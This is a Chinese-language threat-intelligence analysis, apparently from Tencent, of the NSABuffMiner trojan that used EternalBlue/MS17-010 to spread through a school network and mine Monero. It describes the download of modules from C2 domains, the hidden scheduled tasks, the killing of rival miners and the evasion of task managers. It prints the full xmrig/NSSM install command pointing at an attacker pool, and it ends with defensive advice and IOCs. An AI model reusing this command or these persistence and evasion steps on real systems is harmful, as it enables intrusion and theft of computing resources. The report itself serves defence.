NSABuffMiner挖礦木馬霸佔某校園伺服器,非法獲利115萬元
近期騰訊御見威脅情報中心接到使用者反饋,某學校內網水卡管理伺服器被植入名為rundllhost.exe的挖礦木馬。分析後發現該木馬是NSASrvanyMiner挖礦木馬的變種,此木馬同樣利用NSA武器工具在內網攻擊傳播,而該伺服器存在未修復的ms17-010漏洞,因此受到攻擊被利用挖礦。 0×1背景
近期騰訊御見威脅情報中心接到使用者反饋,某學校內網水卡管理伺服器被植入名為rundllhost.exe的挖礦木馬。分析後發現該木馬是NSASrvanyMiner挖礦木馬的變種,此木馬同樣利用NSA武器工具在內網攻擊傳播,而該伺服器存在未修復的ms17-010漏洞,因此受到攻擊被利用挖礦。
該木馬傳播NSA武器工具包的釋放目錄:C:\Windows\IIS\,其中一個C2通訊地址: posthash.org均與NSASrvanyMiner相同,因此我們認為此挖礦木馬是NSASrvanyMiner的變種。
查詢NSABuffMiner挖礦木馬使用錢包資訊,發現該錢包累計挖礦已獲得收益高達115萬元人民幣。
1.png
受攻擊伺服器程序列表
NSABuffMiner挖礦木馬配備了功能強大的NSA工具包,以便在內網攻擊傳播。該木馬為獨佔系統挖礦資源,會查殺30餘個同樣是挖礦木馬的程序,在自己入侵成功之後,還會將135、137、138、139、445等危險埠關閉。其目的是防止其他挖礦木馬順路入侵,再和自己爭搶挖礦資源。
NSABuffMiner挖礦木馬會檢測多個工作管理員的程序,一旦使用者發現系統異常,啟用(Taskmgr.exe、Autoruns.exe、360taskmgr.exe、Perfmon.exe、Procxp.exe、processHacker.exe)等工作管理員檢視系統資源佔用情況時,木馬會立刻嘗試關閉工作管理員。若關閉失敗,木馬會立刻退出。
騰訊御見威脅情報中心提醒企業網管,及時修補內網系統高危漏洞,可配置密碼策略,強制內網使用者使用複雜密碼。這些存在漏洞的系統若被黑客攻擊控制,除了可能感染挖礦木馬,還可能被竊取資料、植入勒索病毒,造成更加嚴重的後果。
0×2 詳細分析
0×2.1 NSA攻擊
木馬執行後在C:\windows\IIS\目錄釋放66個子檔案,攻擊時先關閉防火牆,然後啟動CPUInfo.exe掃描內網機器的445埠,如果埠處於開啟狀態則利用多個NSA武器工具(Eternalblue等)對目標機器進行攻擊,若攻擊成功,則根據不同系統版本在受害機器上執行payload(x86/x64.dll),x86/x64.dll執行後從C2地址繼續下載挖礦和NSA攻擊模組並安裝執行。
2.png
將CPUInfo.exe安裝為計劃任務“GooglePinginConfigs”,並將計劃任務檔案設定屬性為隱藏。
3.png
攻擊主程序CPUInfo.exe關閉防火牆,掃描內網IP並使用NSA武器工具:Eternalblue(永恆之藍),Doubleplsar(雙脈衝星)、EternalChampion(永恆冠軍)、Esteemaudit(RDP漏洞攻擊)對內網機器進行攻擊,若攻擊成功則植入DllPayload:x64/x86.dll。
4.png
攻擊結束後free.bat清理攻擊程序,重啟計劃任務。
5.png
0×2.2 Payload分析
0×2.2.1 Install.exe
攻擊後植入的payload(x86/x64/dll)執行後從da.alibuf.com下載NSA攻擊包安裝程式445.exe,儲存為C:\Windows\Install.exe並啟動安裝。
6.png
Install.exe重新安裝攻擊模組到IIS目錄,從而繼續挖礦和感染。
7.png
0×2.2.2 mask.exe
payload(x86/x64/dll)執行後從da.alibuf.com下載挖礦安裝包程式mado.exe,儲存為C:\Windows\mask.exe並啟動安裝。
8.png
mask.exe啟動demo.bat
9.png
C:\windows\demo.bat通過wmic指令對同行挖礦木馬查殺,以獨享挖礦資源。
10.png
此挖礦木馬在清除其他同行挖礦木馬方面可謂做足了工作,通過查詢疑似挖礦木馬,累計清除10餘個目錄下30餘個程序名。
查詢並殺死程序
wbmoney.exe
GGtbviewer.exe
lservice.exe
ystmss.exe
wuauc1t.exe
Systmss.exe
1.exe
2.exe
3.exe
nanol.exe
svchostr.exe
csrss…exe
wax.exe
Snwhtdw.bat
dllhsot.exe
Tasksvr.exe
serices.exe
seever.exe
mssecsvc.exe
svchsot.exe
lsacs.exe
nsa.exe
csrs.exe
svchost.exe
server.exe
conhost.exe
csrss.exe
expl0rer.exe
查詢可疑路徑
C:\windows\svchost.exe
C:\program files (x86)\stormii\server.exe
C:\program files (x86)\windows nt\conhost.exe
C:\Windows\svchost.exe
C:\ProgramData\dll\svchost.exe
C:\ProgramData\dll\csrss.exe
C:\ProgramData\expl0rer.exe
C:\ProgramData\Natioanl\svchostr.exe
C:\ProgramData\Microsoft\Natihial\cmd.exe
C:\ProgramData\Microsoft\Natioanl\csrss…exe
C:\ProgramData\nm\winlogin.exe
C:\Windows\Fonts\explorer.exe
C:\Windows\Fonts\conhost.exe
C:\Windows\SecureBootThemes\Microsoft\svchost.exe
C:\windows\sysprepthemes\microsoft\svchost.exe
C:\Windows\SpeechsTracing\Microsoft\svchost.exe
C:\ProgramData\Natihial\svshostr.exe
C:\ProgramData\new\csrss.exe
C:\ProgramData\new\csrss.exe
指令碼會繼續關閉135,137,138,139,445埠,避免其他挖礦木馬入侵機器。
11.png
然後從另一個C2地址bmw.hobuff.info:3下載sogou.exe、360safe.exe等木馬進而挖礦和新一輪感染。
12.png
13.png
0×2.3 挖礦
受感染機器下載的挖礦木馬釋放svchost.exe、wininit.exe、rundllhost.exe到C:\Windows\Fonts目錄,其中svchost.exe是NSSM安裝程式,wininit.exe是礦機啟動程式,rundllhost.exe是xmrig礦機。
14.png
啟動礦機前嘗試結束以下監控或分析工具:
Taskmgr.exe
Rundll32.exe
Autoruns.exe
Perfmon.exe
Procxp.exe
processHacker.exe
15.png
如果仍然檢測到以下程序則退出挖礦程式:
Taskmgr.exe
Autoruns.exe
360taskmgr.exe
Perfmon.exe
Procxp.exe
processHacker.exe
16.png
礦機rundllhost.exe採用開源挖礦木馬xmrig 2.5.2編譯 IT資源論壇:www.euei.com.cn 17.png
啟動礦機命令列如下,啟動時使用NSSM服務管理工具將礦機安裝為系統服務,此工具具有自動守護目標服務程序功能,能維持挖礦程序執行,同時可以躲避部分殺軟檢測。
c:\windows\Fonts\svchost.exe install Samserver rundllhost.exe -o x.alibuf.com:443 -u 45c2ShhBmuk6ukfdTLok59U86gWLXZo8kDJbpTm8uYT1U 35mig1pUCbd6796AJviTPXetFrUo37XFGcEYU1k3tYe32o9qEr -p x -k
18.png
19.png
錢包:45c2ShhBmuk6ukfdTLok59U86gWLXZo8kDJbpTm8uYT1U35mig1pUCbd6796AJviTPXetFrUo37XFGcEYU1k3tYe32o9qEr
錢包資訊:
20.png
查詢錢包資訊發現目前已挖礦獲得門羅幣1217.9720個,當前價格摺合人民幣1150788.73元。
21.png
0×3 安全建議
1、伺服器關閉不必要的埠,例如139、445埠等。
- 手動安裝“永恆之藍”漏洞補丁請訪問以下頁面
其中WinXP,Windows Server 2003使用者請訪問
3、企業使用者建議全網安裝御點終端安全管理系統
22.png
4、個人使用者推薦使用騰訊電腦管家,攔截此類病毒攻擊。
0×4 IOCs
C2(部分)
124.232.138.166:3
61.130.31.174:3
221.130.176.203
60.191.206.66
67.229.157.146
220.194.215.229
md5
2cdda243568a10b34936220ebe9b3995
f36fbb000aca01302c74895936b818b3
7f142f5e800096af5de5160ba5caa91e
9ae5a6b60a3f29e14aa2b29a03e55bc8
db39c2043a72537274d4f92b2240fd9c
a755f76611af191caac97da04633b012
1b41317b15287ab681defabc66ef638b
d83c9f5919915fc6c54276d6d0e79bf4
36543e571a50ac91acd5c9e9c5de36fb
064ede68095b3ab5d8a22da2d1e59c02
2e332960bf1feb4aa90b156322c7e98d
d376172100a4cf4e91531277cc368294
931350ab9d8c235f48219c4e126bd6cd
1065f9b7c189f4a22d7f11626f16b976
7add4dd082e2e84ea7ea41a48a267450
584c2211a059c4018d2eddf8f669d63d
f8408d85ade39d73c3c4bdf692a26c01
a94ecd370a2bae1381a40c9b6d7a300c
27c1f49ad677dff41ed3537e9e299868
081f10718d76c9b3b19901f0ee630960
04c5dab014e1b8640ce9ea9580bb0b09
e9c6bf0de42aa2449f1ed4bbb50ddcd6
a17bd95441d3fa37660e87842dc896aa
9feecd709f395bd8a0d1d3a2e77d2e34
857fc3145d5aee4399bf6c9fd9dc8245
69833a3ecc52f57a02656d46e1799dcc
11275993a1a8f44371ab48820422b273
596a05756e87176b56d205fd38f2947e
d1d15aa8d749e61a06c8ed04454827b3
7ac8d07cec8264b00139f5575c3a4a71
8a4e9f688c6d0effd0fa17461352ed3e
b8af096248b3e7283f69a6c668609408
c673e31da52314ac65e583f8409f097e
ce5f524f8dc3c01ad7e67a21d0d6a754
e2108aa70c161208ffdcbf5c60a862cc
9aa087a88e766a49a9d4ae0a5e8c2b02
29f15fd8103a69e81fde23e4592baa60
37a98c6150d2317eb6e0df1516a5b3a4
873c5bc9bbf95db1b4e51374231245ae
a28e6a0150d00c0cbcf6b11e70b384cf
d42b7eb22678a6c35674fde3aaae0cb3
56398c3eb7453017af674ab85df17386
6852f47732e3560f997af626094a5a99
6e1bbd373fc929f83160d4a40ce09d65
8f55f1381ce6bc1a4ee50bde5895b3a1